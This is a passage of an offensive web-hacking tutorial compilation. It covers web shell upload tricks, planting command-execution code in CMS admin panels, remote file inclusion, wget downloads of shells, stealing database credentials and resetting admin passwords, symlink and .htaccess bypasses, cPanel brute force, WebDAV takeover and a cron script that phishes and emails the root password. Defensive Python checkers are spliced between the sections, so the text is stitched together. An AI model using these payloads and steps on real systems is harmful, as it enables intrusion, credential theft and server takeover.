supported only jpg files. That's why I renamed it to shell.php.jpg.)
2. Open Firefox and start the Live HTTP Headers add-on, then upload your shell.
3. Your Live HTTP Headers window will then look something like this:

4. Click on shell.php.jpg, then click on the Reply button.
5. A new window will open with two boxes; we have to
work in the second box.
6. In the second box, rename shell.php.jpg to shell.php, then click on the Reply button again.

WAY 6
Find yourself a copy of edjpgcom.exe. "edjpgcom is a free Windows application that allows you
to change (or add) a JPEG comment in a JPEG file." Usage: edjpgcom "filename.jpg". Now
add this to the JPEG comment, since you won't be able to drop a whole shell in there due to size limits
etc.:
"; system($_GET['cmd']); echo ?>


Now rename your .jpg to .php and upload it.

WAY 7
Another way to fool the web server into thinking you're uploading an image instead of a PHP shell is to
get Firefox and install the "Tamper Data" add-on, click Start Tamper, upload your PHP shell, then
tamper the data and change the Content-Type from 'application/octet-stream' to 'image/jpeg'. If you have any
problem uploading a shell using Tamper Data, just do a simple Google search; many video tutorials
on this are available on the web, so I am not explaining it step by step.
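As an added defensive example (not part of the original guide), here is a server-side upload check that closes the gaps Ways 1, 3, 5 and 7 rely on: every extension segment is validated (so shell.php.jpg is refused), the client Content-Type is ignored in favour of magic-byte sniffing, and the whole body is scanned for interpreter markers so a GIF89a; prefix or a JPEG comment does not pass. The allowlist, the marker regex and the sample files are my own constructions.

```python
import os
import re
import secrets

# Allowed extensions and the magic-byte prefixes each one must start with.
ALLOWED_TYPES = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Interpreter openers and execution sinks that have no business inside an image.
# Deliberately narrower than a bare "<?", which would also hit the harmless
# "<?xpacket" XMP header found in many real JPEGs.
SCRIPT_MARKERS = re.compile(
    rb"<\?(?:php\b|=)|<%|\$_(?:GET|POST|REQUEST|COOKIE)\b"
    rb"|\b(?:system|passthru|shell_exec|exec|eval)\s*\(",
    re.IGNORECASE,
)


def validate_upload(filename, client_content_type, data):
    """Return (accepted, reason). client_content_type is only echoed, never trusted."""
    base = os.path.basename(filename).lower()
    parts = base.split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "missing extension"
    # Every extension segment must be allowed: "shell.php.jpg" ends in .jpg, but an
    # Apache AddHandler for .php still matches the inner segment.
    for ext in parts[1:]:
        if ext not in ALLOWED_TYPES:
            return False, f"disallowed extension segment '.{ext}'"
    ext = parts[-1]
    # The client-supplied Content-Type can be rewritten in transit (Tamper Data
    # style), so the real file header decides.
    if not any(data.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        return False, f"content does not match .{ext} magic (client claimed {client_content_type})"
    # A valid header proves nothing about the body: a "GIF89a;" prefix or a JPEG
    # comment can still carry code, so scan the whole payload.
    hit = SCRIPT_MARKERS.search(data)
    if hit:
        return False, f"script marker {hit.group(0)!r} at offset {hit.start()}"
    return True, "ok"


def storage_name(ext):
    """Server-chosen name for the stored file: never reuse the client's filename."""
    return f"{secrets.token_hex(16)}.{ext}"


# Constructed samples modelled on the tricks described above (not real files).
SAMPLES = {
    "clean_jpeg": ("photo.jpg", "image/jpeg",
                   b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00" + b"\x00" * 32),
    "double_ext": ("shell.php.jpg", "image/jpeg", b"\xff\xd8\xff\xe0" + b"\x00" * 32),
    "fake_mime": ("shell.jpg", "image/jpeg", b"<?php system($_GET['cmd']); ?>"),
    "gif_prefix": ("shell.gif", "image/gif", b"GIF89a;<?php system($_GET['cmd']); ?>"),
    "jpeg_comment": ("pic.jpg", "image/jpeg",
                     b"\xff\xd8\xff\xfe\x00\x20\"; system($_GET['cmd']); echo ?>" + b"\x00" * 8),
    "xmp_jpeg": ("meta.jpg", "image/jpeg",
                 b"\xff\xd8\xff\xe1\x00\x40http://ns.adobe.com/xap/1.0/\x00<?xpacket begin='' ?>"),
}


def check_samples():
    """Run every sample through the validator; returns {name: (accepted, reason)}."""
    return {name: validate_upload(*args) for name, args in SAMPLES.items()}


if __name__ == "__main__":
    for name, (ok, reason) in check_samples().items():
        print(f"{name:13s} {'ACCEPT' if ok else 'REJECT'}  {reason}")
```

Storing accepted files outside the web root under a storage_name() and re-encoding images before serving them removes the remaining risk even when a marker slips past the scan.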

WAY 8
All the above-mentioned ways work when we find an upload button on the site, but when there is no upload
button, it's not easy to upload a shell there. We can try a few things. We have to find out if there is an
edit option for an existing php/asp/aspx page. If there is an edit option, open that page and delete the whole
script. After that, open your shell in Notepad, copy the script, paste it into that page and save it. Now that
link will be your shell. We can possibly find an edit option in the following pages of a site:
Contact us.php / Contact us.asp
Class.php / Class.asp
About us.php / about us.asp
Terms.php / terms.asp
NB: some news, vehicle selling, cart etc. sites don't have any option to upload a file after logging in
through the admin panel. They only allow file upload after logging in through cPanel.

WAY 9
SOMETIMES, ON SITES VULNERABLE TO REMOTE FILE INCLUSION, WE HAVE TO EXECUTE
A SHELL FROM ANOTHER HOSTING SITE. METHOD:
1) UPLOAD YOUR SHELL TO A FREE HOSTING SITE LIKE www.my3gb.com, www.3owl.com,
www.ripway.com, www.000webhost.com, etc.
2) Now suppose your shell link is www.example.my3gb.com/c99.txt and YOUR VULNERABLE
SITE IS www.site.com
3) Now we have to open the following URL to gain shell access to that site.
http://www.site.com/v2/index.php?page=http://www.example.my3gb.com/c99.txt
4) REPLACE THE SITE LINKS IN THE URL ACCORDING TO YOUR SHELL AND
VULNERABLE SITE LINKS.
SHELL UPLOADING IN joomla, wp, vb, smf, ipb, mybb SITES

IN THE ABOVE-MENTIONED SITES WE GENERALLY CAN'T FIND A DIRECT UPLOAD OPTION,
SO WE HAVE TO DO IT IN OTHER WAYS.

1. Joomla Site:
After logging into the admin panel you will find Extensions as the 5th menu item. Expand it and click Template Manager
> check any template (like beez, ja_purity). Now click on Edit (upper right), then click on Edit
HTML, paste your shell code and click Save. Done: site.com/templates/template name/index.php, like
site.com/templates/beez/index.php

2. WordPress:
Log into the admin panel, expand Appearance, then click Editor; you will find style.css.
Now select 404.php on the right side, paste your shell code and click Edit File. You can find the
shell at site.com/wp-content/themes/theme name you edited/404.php

3. vBulletin:
1- Log in to the admin CP
2- Under "Plugins & Products", select Add New Plugin
3- Adjust the settings as follows:
Product: vBulletin
Hook Location: global_start
Title: (Anything ...)
Execution Order: 5
Code:
ob_start(); system($_GET['cmd']); $execcode = ob_get_contents(); ob_end_clean();


Plugin is Active : Yes
4- After the plugin is added, go to the heading "Style and Design" and select "Style Manager".
5- Under whatever the default style is in the dropdown menu, select Edit Templates.
6- Scroll to the ForumHome templates and expand them. Click [Customize] beside FORUMHOME.
7- Search for the code:
$header somewhere near the top. Replace it with: Code: $header $execcode


8- Now go to the forum and add this after index.php:
Code:
?cmd=wget http://www.site.com/shell.txt;mv shell.txt shell.php


So it looks like Code:
http://www.site.com/pathtoforum/index.php?cmd=wget http://www.site.com/shell.txt;mv shell.txt shell.php


What this does is download shell.txt and rename it to shell.php. Now the shell should be located in the
forum directory as shell.php. If not, wget is disabled on that server; you can try alternative methods:
http://www.site.com/pathtoforum/index.php?cmd=curl http://www.site.com/shell.txt > shell.php

http://www.site.com/pathtoforum/index.php?cmd=GET http://www.site.com/shell.txt shell.php



4. SMF:
Log into the admin panel. You need to download any SMF theme in zip format, put your shell.php in it and save it.
Admin panel > select Themes and Layout > Install a new theme > browse and upload the theme that has our
shell.php :) After upload the shell will be found at site.com/Themes/theme name/shell.php

5. IPB:
Log into the admin panel > Look and Feel > Manage Languages, choose a language > section (example)
public_help, edit: help.txt. Choose a topic from the list, or search for a topic. In the right box add the code below:
${${print $query='cd cache; wget http://link_to_shell/shell.txt;mv shell.txt shell.php'}} ${${system($query,$out)}}
${${print $out}}


When you add it, click Go at the bottom. Now we go to
http://www.site.com/index.php?app=core&module=help and the code we added will be executed, and you will
get your shell at www.site.com/cache/shell.php

6. phpBB
Log into the admin panel > go to Styles -> Templates -> Edit; for the template file choose faq_body.html. At
the bottom of:

we add:
fwrite(fopen($_GET[o], 'w'), file_get_contents($_GET[i]));

And save it. Now go to:
www.site.com/forum/faq.php?o=shell.php&i=http://link_to_shell.com/shell.txt and the shell will be found in the site
path/shell.php


7. MyBB:
Log into the admin CP > go to Templates and Styles and find what the default MyBB theme is. Then
go to Templates and expand the templates that are used by the current theme. Find Calendar Templates and
click it. Click 'calendar'. Above all the HTML code, paste this: http://pastebin.com/nA3asuNz
Save :) The shell will be found at site.com/calendar.php
Note: if you get an error like "code is danger unable to edit", then simply paste your deface code to
deface calendar.php

Tutorial: shell uploading through phpMyAdmin
Requirements:
- You must have the full path
- phpMyAdmin and MySQL DB privileges.
It's not every day you get to use this; it's rare, but today I exploited a site by this, so I
thought of writing a tutorial. OK then, let's start.

First log in to MySQL.


Now click 'Show MySQL system variables',

then 'SQL'.


Now you can run SQL commands, like create DB, delete tables or whatever. We want to upload a shell,
so let's move on to it.
Now we will create a command line in a new file with SELECT INTO:

SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "full/path/here/cmd.php"

and click 'Go'.


Now the cmd line is at http://site.com/cmd.php; let's run the command to get a shell.

wget http://www.r57.biz/r57.txt;mv r57.txt shell.php



And that's it, we have a shell on the server xD

Shell Jumping


Requirement: b374k shell
(Click on the link and you will get a php file; just right-click and select Save, or press Ctrl+S on the
keyboard, and save it under any name like hacker.php, myshell.php or darksite.php.)
Follow these steps:
 After uploading the shell, click on Local Domain to view all websites hosted on the same
server and check which are readable.
 Now choose any website from the local domain list and copy its Senarai User value, then
go to Home and paste it in View file/folder after home/replacethiskeyword/public_html/.
For example, if the current View file/folder value is home/abc/public_html and your target website's
Senarai User value (username) is xyz, then the View file/folder value will be
home/xyz/public_html/
 After going to that folder, look for the MySQL config (wp-config.php in WordPress and
configuration.php in Joomla). Open the file and you'll get the database username and
password here.
It will look like:
Username = /** MySQL database username */ define('DB_USER', 'googlyma_wrdp1');

PASSWORD =
/** MySQL database password */
define('DB_PASSWORD', 'PHZ2hum6{{KE');

 Now connect to the MySQL database with the username and password and enter this SQL query:

UPDATE wp_users SET user_pass =md5( '123456') WHERE user_login = 'admin';

 Now that we have done it,
go to http://webste.com/wp-admin/ and log in with the username and password.

Log in with username admin and password 123456, and you have successfully done it.

Symlink Bypass 2013 for Linux Servers

Note: This method is not applicable to GoDaddy, Bluehost, HostGator and HostMonster
servers.
For this you first need the following files:
 Sen Haxor CGI Shell
 sen.zip
 passwd-bypass.php
 Turbo Brute force Cpanel
 Port.py
Before starting to symlink we first need to create php.ini and ini.php to disable safe mode
and disabled functions on the server.
Use the following code. Make a php.ini with the following content:
safe_mode=Off
And ini.php with:

<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["file"]);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["ss"]);
?>

So after creating php.ini and ini.php, upload the other files to the server.
BYPASSING SYMLINK ON PLESK, DEBIAN, CENTOS & REDHAT SERVERS
Now I will explain how to bypass symlink on Plesk, Debian, CentOS and RedHat.
Commonly all of the above have a root path like
/root/var/www/vhost/
where all sites will be under the vhost directory. But you won't have permission to view it, so we
will create a symbolic link to root, view the site and symlink the config files.
Make a new directory in your shell, for example sen, then upload sen.zip. Then use this command to
unzip the file and create a symbolic link to root.
Command: unzip sen.zip
Note: On some servers the unzip command won't work, so you can manually create a symlink to root
by using the command ln -s / root
Then You will see this
$ unzip sen.zip
Archive: sen.zip

linking: sen.txt -> /
finishing deferred symbolic links:
sen.txt -> /
This means a symbolic link has been created to / (root).
 Now we need to upload a .htaccess; use the following:
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
Done, bypassed. Now view /var/www/vhost/ and you will be shown all the sites.
BYPASSING SYMLINK ON APACHE AND LITESPEED
Mostly when you try to symlink an Apache server in 2013 you will face 403 Forbidden, 404 Not
Found or 500 Internal Server Error.
These can be bypassed by using different .htaccess files individually.
BYPASSING SYMLINK ON APACHE & LITESPEED - Linux Servers.
First, for this, make a new directory in your shell, for example sen, then upload sen.sa and .htaccess
from the Sen Haxor CGI shell, for which I added the download link at the end of the tutorial.
After uploading .htaccess and sen.sa to the new directory sen, chmod sen.sa to 0755.
Then open the CGI shell and log in (password: senhaxor).
Now there are several methods to bypass 403 Forbidden. You need to try all the following
methods; at least one will give you success.
Method 1: .shtml method
This is the method most commonly used by hackers to bypass the 403 Forbidden error.
So before we proceed, first you need to get the whole /etc/passwd from the server so that we can find the
usernames and the paths where the sites are located.
On 2013 servers many functions are enabled which show 403 Forbidden when you try to
read /etc/passwd with cat on the server,

so I made a powerful shell which can bypass that and get /etc/passwd from the server.
I will also add it to the downloads.
Upload the /etc/passwd bypasser shell and get the whole /etc/passwd.
Then log in to the Sen Haxor CGI Shell and create a symbolic link to your target:
 Step 1 : ln -s / root
 Step 2 : ln -s /home/username/public_html/config.php 1.shtml
Example: if our site is www.site.com, the username is site and it's WordPress:
ln -s /home/site/public_html/wp-config.php 1.shtml
So we created a symbolic link to our target. Now you need to go to your shell and edit the
.htaccess with the following code:
Options +FollowSymlinks
DirectoryIndex itti.html
RemoveHandler .php
AddType application/octet-stream .php
Once you have done this, open 1.shtml in your browser, right-click and view source. You will
be able to view the config.
This is the common way of bypassing 403 Forbidden and LiteSpeed.
Now let me explain the advanced method =)
Method 2: Bypassing Symlinked Config From cPanel
For this you need at least one cPanel access on the server. I will tell you how to easily crack
cPanel.
First run this command: ls /var/mail
You will then be shown all the usernames on the server. Copy them all.
Now upload the Turbo Brute Force Cpanel script (I will attach it with the downloads).
Open the script and paste all the usernames we got into User.
And for Password, here is the wordlist:

Copy it all and paste it into Password, select Simple and click Submit.
If you're lucky you will be shown cracked cPanels.
Once you have a cPanel on the server you can bypass 500 Internal Server Error and 403 Forbidden
errors from port 2077 and from Error Pages in the File Manager.
Just symlink the config
ln -s /home/user/public_html/wp-config.php config.shtml
Log in to the cPanel,
then go to File Manager -> Error Pages.
Then choose any of these according to which error is triggered when you open your symlinked
config:
400 (Bad request)
401 (Authorization required)
403 (Forbidden)
404 (Not found)
500 (Internal server error)
Example: "&file=400.shtml&desc=(Bad request)"
We can get the config with
"&file=config.shtml&desc=(Bad request)"
BYPASS SYMLINK FROM PORT 2077
So once you have symlinked the config, you can just log in on port 2077,
then open public_html/path/config.shtml.
You will be able to download config.shtml and view the source.
Method 3: Symlink Bypass via Open Port using Python
For this we first need Python installed on the server.
To check if Python is installed, run this command: python -h
If it's installed we can use the following Python script to bypass:

#!/usr/bin/env python
# devilzc0de.org (c) 2012
import SimpleHTTPServer
import SocketServer
import os

port = 13123
if __name__ == '__main__':
    os.chdir('/')
    Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
    httpd = SocketServer.TCPServer(("", port), Handler)
    print("Now open this server on webbrowser at port : " + str(port))
    print("example: http://site.com :" + str(port))
    httpd.serve_forever()
I have added the script to the downloads.
Now upload the script to the shell.


Now run this command: python port.py


Now Open the site with port 13123
www.site.com:13123

Server bypassed from the open port.
Method 4: Bypassing Symlink Using .ini Method
Log in to the Sen Haxor CGI shell and normally create a symlink to your target with a .ini extension:
ln -s /home/user/public_html/wp-config.php config.ini
Now go to the shell, make a new file a.shtml,
paste the following code inside it and save it:
<!--#include virtual="config.ini"-->
and save it.
Now open a.shtml in the browser, right-click and view the source. Done, bypassed.
Method 5: Bypassing Symlink Using ReadMe file
Make a new directory in your shell. From the CGI shell, normally symlink the config:
ln -s /home/user/public_html/config.php config.txt
Now make a .htaccess with the following code:
.htaccess
Options All
ReadMeName config.txt
Now when you open the directory in the browser you will be shown the config source
directly.
E.g.: if site.com/sen/config.txt is your symlinked config, then when you open
www.site.com/sen/ your symlinked config will be displayed as the ReadMe content.
That's it, I have explained all the methods to bypass symlink. If you still have problems bypassing,
try all the following .htaccess files:
1 - > .htaccess
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm

AddType txt .php
AddHandler txt .php
2 -> .htaccess
Options All
DirectoryIndex ssss.html
addType txt .php
AddHandler txt .php
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
3 -> .htaccess
suPHP_ConfigPath /home/user/public_html/php.ini
4 -> .htaccess
Options +FollowSymLinks
DirectoryIndex Sux.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
5 -> .htaccess
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php

<IfModule mod_autoindex.c>
IndexOptions
FancyIndexing
IconsAreLinks
SuppressHTMLPreamble
</IfModule>
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

.HTACCESS TO BYPASS DISABLED FUNCTIONS
This one is to make python work :
.htaccess
AddType application/x-httpd-cgi .py
AddHandler cgi-script .py
AddHandler cgi-script .py

This one is to make perl work :

.htaccess
AddType application/x-httpd-cgi .pl
AddHandler cgi-script .pl
AddHandler cgi-script .pl

This one is to enable Symlink if the function is disabled in the server :

.htaccess
<Directory "/home"> *** Options -ExecCGI* ***
AllowOverride
AuthConfig Indexes
Limit FileInfo
Options=IncludesNOEXEC,Indexes,Includes,MultiViews
,SymLinksIfOwnerMatch,FollowSymLinks
</Directory>

This one is to retrieve users permissions :

.htaccess
AddType text/plain .php
Options +Indexes
DirectoryIndex filename.html

Bypass Internal Server error :
.htaccess
<IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule>
Change php version:
.htaccess
AddType application/x-httpd-php4 .php

Bypass Uploads Options and upload shell in another extension :

<FilesMatch "^.*\.mp3"> SetHandler application/x-httpd-php </FilesMatch>


Retrieve Config with picture method :
.htaccess
Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .gif
AddHandler cgi-script .gif
AddHandler cgi-script .gif
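As an added defensive example, not from the tutorial or its scripts, the checker below reads a .htaccess file and flags the directive patterns listed above: executable handlers mapped onto image or media extensions, PHP re-typed as plain text or stripped of its handler (the symlink source-disclosure trick), ReadMeName and Options flags that widen listings, mod_security switched off, and suPHP_ConfigPath overrides. The severity labels and the constructed sample file are my own.

```python
import re
import shlex

# Handlers and MIME types that make Apache execute a file instead of serving it.
EXEC_HANDLERS = {
    "cgi-script", "server-parsed", "application/x-httpd-cgi",
    "application/x-httpd-php", "application/x-httpd-php4", "application/x-httpd-php5",
}
# Extensions that are expected to be executed server-side.
SCRIPT_EXTS = {".php", ".phtml", ".php3", ".php4", ".php5", ".phar",
               ".cgi", ".pl", ".py", ".sh", ".shtml"}
PHP_EXTS = {e for e in SCRIPT_EXTS if e.startswith(".ph")}
# Options flags that widen what a directory listing or a symlink can expose.
RISKY_OPTIONS = {
    "all": "turns on every option, FollowSymLinks and Includes included",
    "followsymlinks": "symlinks are followed regardless of owner",
    "symlinksifownermatch": "symlinks to same-owner files are followed",
    "indexes": "directory listing is enabled",
    "includes": "SSI is enabled (include virtual reads symlinked files)",
    "execcgi": "CGI execution is enabled",
}
WAF_DIRECTIVES = {"secfilterengine", "secruleengine", "secfilterscanpost"}
# <IfModule ...>, <FilesMatch "..."> and </...> wrappers, possibly on one line.
TAG_RE = re.compile(r"<\s*/?\s*[A-Za-z]+[^>]*>")


def scan_htaccess(text):
    """Return [(line_no, severity, message)] for risky .htaccess directives."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = TAG_RE.sub(" ", raw).strip()
        if not line or line.startswith("#"):
            continue
        try:
            tokens = shlex.split(line)
        except ValueError:           # unbalanced quote: fall back to a plain split
            tokens = line.split()
        name, args = tokens[0], tokens[1:]
        directive = name.lower()
        if directive in ("addhandler", "addtype", "sethandler") and args:
            target = args[0].lower()
            exts = [a.lower() for a in args[1:]]
            if target in EXEC_HANDLERS:
                odd = [e for e in exts if e not in SCRIPT_EXTS]
                if directive == "sethandler" or odd:
                    what = ", ".join(odd) or "every matched file"
                    findings.append((n, "HIGH", f"{name} executes {what} as {target} (upload filter bypass)"))
                if target == "server-parsed" and any(e in PHP_EXTS for e in exts):
                    findings.append((n, "HIGH", f"{name} hands PHP to mod_include (script source disclosure)"))
            elif any(e in SCRIPT_EXTS for e in exts):
                findings.append((n, "HIGH", f"{name} serves {' '.join(exts)} as {target} (script source disclosure)"))
        elif directive == "removehandler" and any(a.lower() in SCRIPT_EXTS for a in args):
            findings.append((n, "HIGH", f"{name} strips the interpreter from {' '.join(args)} (script source disclosure)"))
        elif directive == "options":
            for a in args:
                flag = a.lstrip("+-").lower()
                if not a.startswith("-") and flag in RISKY_OPTIONS:
                    findings.append((n, "MEDIUM", f"Options {a}: {RISKY_OPTIONS[flag]}"))
        elif directive in ("readmename", "headername"):
            findings.append((n, "MEDIUM", f"{name} inlines {' '.join(args)} into the directory index"))
        elif directive in WAF_DIRECTIVES and args and args[0].lower() == "off":
            findings.append((n, "HIGH", f"{name} Off disables mod_security filtering"))
        elif directive == "suphp_configpath":
            findings.append((n, "HIGH", f"custom php.ini {' '.join(args)} can override safe_mode/disable_functions"))
    return findings


# Constructed sample assembled from the directive patterns quoted in the tutorial.
SAMPLE_HTACCESS = "\n".join([
    "Options +FollowSymLinks",
    "DirectoryIndex itti.html",
    "RemoveHandler .php",
    "AddType application/octet-stream .php",
    "<IfModule mod_security.c>",
    "SecFilterEngine Off",
    "SecFilterScanPOST Off",
    "</IfModule>",
    "AddHandler cgi-script .gif",
    r'<FilesMatch "^.*\.mp3"> SetHandler application/x-httpd-php </FilesMatch>',
    "ReadMeName config.txt",
    "suPHP_ConfigPath /home/user/public_html/php.ini",
])

if __name__ == "__main__":
    for line_no, severity, message in scan_htaccess(SAMPLE_HTACCESS):
        print(f"line {line_no:2d} {severity:6s} {message}")
```

None of these directives take effect where the server config sets AllowOverride None (or a minimal AllowOverride list) for user-writable document roots; that is the upstream control, and the scanner is only the audit.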
DOWNLOAD LINK OF THE SCRIPTS I HAVE USED ON THE TUTORIAL :

www.mediafire.com/download/08oeos9cpaloeum/Bypass_Symlink_on_2013_Server_With_Different_.htaccess_and_Methods_by_Sen_Haxor.rar

So that's it, I think I have covered everything related to bypassing symlink and disabled
functions on the server. If you still face problems in symlinking, contact me:

www.facebook.com/cheenu.vis

Greetz : Lucky - Ashell - Ethicalnoob - Striker - Zagar Yasir - CyberAce Legion - Yash bro -
Godzilla - Architkp - RooT_Devil -Navneeth Singh - Cyberboy India- Cooltoad_ICA - Suriya
Prakash - Avinash Mohiti - Ion -Shorty420 - Suriya Subash - Darkw0lf - Manoj Nath -Sksking
Decoder - Rafay Bolach -Mike Wals - Team Indishell and all Indian Hackers

Hack WebDAV & Deface

Alright guys, today in this tutorial I'll be explaining how to use the WebDAV
exploit. The link for the tools used in this tutorial can be found at the
bottom of this tutorial. For those of you who do not know what WebDAV is,
here is the definition.


Web-based Distributed Authoring and Versioning, or WebDAV, is a set of
extensions to the Hypertext Transfer Protocol (HTTP) that allows computer-
users to edit and manage files collaboratively on remote World Wide Web
servers.

But for our purpose we will be using it to exploit RDPs, or the Remote
Desktop Protocol. For a better understanding, these RDP hosts could
range from VPSs to dedicated servers to just plain old home PCs, but no matter what it
is you will gain full access to the machine and can basically do whatever you
want using a shell. For those of you who are new to the hacking scene, a
shell is a PHP script that allows you to view all of the files on the server you
decide to host the shell on. The most common shells are the c99 and the r57,
but in this case we will be using the c99. Now please be aware these are not
the only shells available; there are several posted throughout the forum and
you can find them by simply using the search button located on the navbar.
Now before being able to use the shell we have to find some vulnerable IPs
to gain access to. For this we will be using the WebdavLinkCrawler, which can
be found in the WebDAV tool kit I have provided below. If you don't
trust my download links, simply don't download them; it's that simple. Once
you have managed to open the program you will be presented with this
interface.

As you can see there are Start, Stop and Remove Double buttons. All of these terms
will be explained later on, but what you are going to want to do is click the
Start button and it will begin to search for IPs with WebDAV on them.
Once you have managed to gather some IPs like you see in the picture here,




Now please be aware this was only with about 15 seconds of searching, and
your results may differ depending on your connection speed as well as the
amount of time you run the application. After you have all of your IPs, you're
going to want to click one so it's highlighted and then right-click it. You will be
presented with a popup that looks like this:




I have no idea what that actually means (if someone would like to translate
and tell me, please feel free), but what it is doing is copying all of the IPs
you have scanned. After you have scanned all of the IPs, you're going to want
to paste them in a new Word document.

Once you have done so, save it as something you can remember and put it in
a convenient location. After you have saved your collected WebDAV IPs in a
Word document, you're going to want to open the IP Scanner in the folder. It
will look like this:




What you're going to want to do is click the "Get Ip's" button and browse to
your recently saved text file. After you have your IPs in place,

you're going to want to press the Scan button. What this is doing is taking
all of your WebDAV IPs and figuring out which ones are vulnerable to this
particular exploit. The ones on the right are the ones it scanned, and if you
happen to get any in the middle, those are the ones you can exploit. In my
case this time I didn't happen to have any that were open to this exploit
because I had a limited number of IPs. After you have managed to gather
some IPs in the middle column and are ready to exploit the server, you can
double-check by going to ip/webdav/ in your browser, the IP being
one of the exploitable ones you managed to get, and you're going to be looking
for an index page that says WebDAV Test Page. After you have confirmed it
is ready to go, you're going to want to open "Map network drive"; this can be
found by right-clicking Network or My Computer in the Start menu.




What you're going to want to click on is the hyperlink that reads "Connect to a
website that you can use to store your documents and pictures". You will be
presented with a screen; all you have to do is click Next. Then you're going
to want to click "Choose a custom network location".

Now this is the important screen it should look like this




What you have to do is put Ip/webdav in the text box and click Next.

You should then be prompted with a login box; the default username is
wampp and the default password is xampp. Once you have successfully
connected you can browse its folders, so what you have to do now is
just drag and drop shell.php inside the main directory.




After doing so, go to ip/webdav/shell.php; it should look like the following:

Feel free to use that IP if you are that much of a noob and cannot do
anything for yourself. Once you are viewing your shell, inside the Execute
textbox you're going to want to run the following commands:

net localgroup administrators SUPPORT /Add

What this is doing is making the remote desktop username SUPPORT and
the password !password!. So now the last and final step is to open Remote
Desktop and connect using the IP and the login details we have just created.
The shell is for you to explore and discover for yourself. Now you may be
wondering: what can you do once you're in?

Answer: 1. You can do so much! Plant rootkits / upload your RAT on the
server :D
2. I upload my RATs in case they try to take back their dedi.
3. Host a web IRC bot or shell booter
4. Store files or host websites or shells
5. Make a botnet!

TOOLS:
http://dl.dropbox.com/u/18083172/Webdav%20tools.rar

Root server without local root exploit
Many hackers find it difficult to find a local root exploit for rooting a server. So here are a few
methods you could try to gain root access without using a local root exploit!
1. Custom Cron Tab Scripts
Cron jobs are tasks that are set to be executed at a specific time. If the root user has
created a custom script used by cron, and we can write to this file, we can send a "fake" error
message and the root user will probably type in his password.
First, check whether there are any cron job tasks:
crontab -l
If you see any custom script, we must check whether we can write to it.
Let's say we have a custom script here: /bin/cronscript
To check if we can write to the file, type:
stat /bin/cronscript


(If you get something like "-rwxrwxrwx" in the output, you can edit the file!)
Let's edit the file and send a fake error message.
Make a copy of the original script to /bin/cronscript.bak:
cp /bin/cronscript /bin/cronscript.bak
Edit /bin/cronscript like this:
#!/bin/sh
echo "An System Error Occured!"
echo ""
echo "Error Code: #131425"
echo ""
echo "Update to get the Latest Patch for this Security Issue."
read -s -p "[sudo] password for root " rootpasswd
echo ""
echo "su: Authentication failure"
echo ""
sudo apt-get update && sudo apt-get upgrade
sudo echo "The Password is: $rootpasswd" > .kod
mail -s "Root's Password" "[email protected]" < .kod
rm .kod
mv cronscript.bak cronscript

You should just replace the underlined parts with your e-mail and the name of the script!
After you save the file, type chmod +x cronscript to set it as executable!
This script will:
- Send a fake error message
- Request the root password
- Send the password to your e-mail address (make sure that the "mail" command is present in
/bin)
- Restore the original file
When the script gets executed, the root user will enter his password and it will be sent to you!
It would be better if you had some knowledge of Bash programming.
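From the defender's side, the condition this attack depends on (a script run by root's cron that some other account can modify) is easy to audit. The added example below is mine and not part of the tutorial: it parses crontab text (the /etc/crontab layout with a user field, or a per-user crontab as printed by crontab -l) and reports commands whose script is group- or world-writable, owned by a non-root user, sits in a world-writable directory, or is given only as a relative name. The crontab excerpt and the fake stat table are constructed for the demonstration.

```python
import os
import shlex
import stat


def first_command_path(command):
    """Best-effort: the program a crontab command line invokes (skips VAR=value prefixes)."""
    try:
        tokens = shlex.split(command)
    except ValueError:
        tokens = command.split()
    for tok in tokens:
        if "=" in tok and not tok.startswith("/"):
            continue
        return tok
    return None


def parse_crontab(text, system=True):
    """Yield (schedule, user, command). system=True is the /etc/crontab and
    /etc/cron.d layout with a user field; False is a per-user crontab."""
    extra = 1 if system else 0
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue                          # comment or VAR=value line
        nsched = 1 if line.startswith("@") else 5
        parts = line.split(None, nsched + extra)
        if len(parts) < nsched + extra + 1:
            continue                          # malformed entry
        schedule = " ".join(parts[:nsched])
        user = parts[nsched] if system else None
        yield schedule, user, parts[-1]


def audit_crontab(text, system=True, stat_of=None):
    """Return [(path, issue)] for cron commands an unprivileged user could tamper with.
    stat_of(path) -> (st_mode, st_uid) or None; defaults to os.stat on the live system."""
    if stat_of is None:
        def stat_of(path):
            try:
                st = os.stat(path)
            except OSError:
                return None
            return st.st_mode, st.st_uid
    issues = []
    for _, user, command in parse_crontab(text, system):
        path = first_command_path(command)
        if path is None:
            continue
        runs_as = user or "the crontab owner"
        if not path.startswith("/"):
            issues.append((path, f"relative name resolved through cron's PATH, runs as {runs_as}"))
            continue
        info = stat_of(path)
        if info is None:
            issues.append((path, "command missing (dangling entry, name can be claimed)"))
            continue
        mode, uid = info
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            issues.append((path, f"group/world-writable (mode {stat.S_IMODE(mode):04o}) but runs as {runs_as}"))
        if user == "root" and uid != 0:
            issues.append((path, f"owned by uid {uid} but runs as root"))
        parent = stat_of(os.path.dirname(path) or "/")
        if parent and parent[0] & stat.S_IWOTH and not parent[0] & stat.S_ISVTX:
            issues.append((path, "parent directory world-writable without sticky bit (file can be replaced)"))
    return issues


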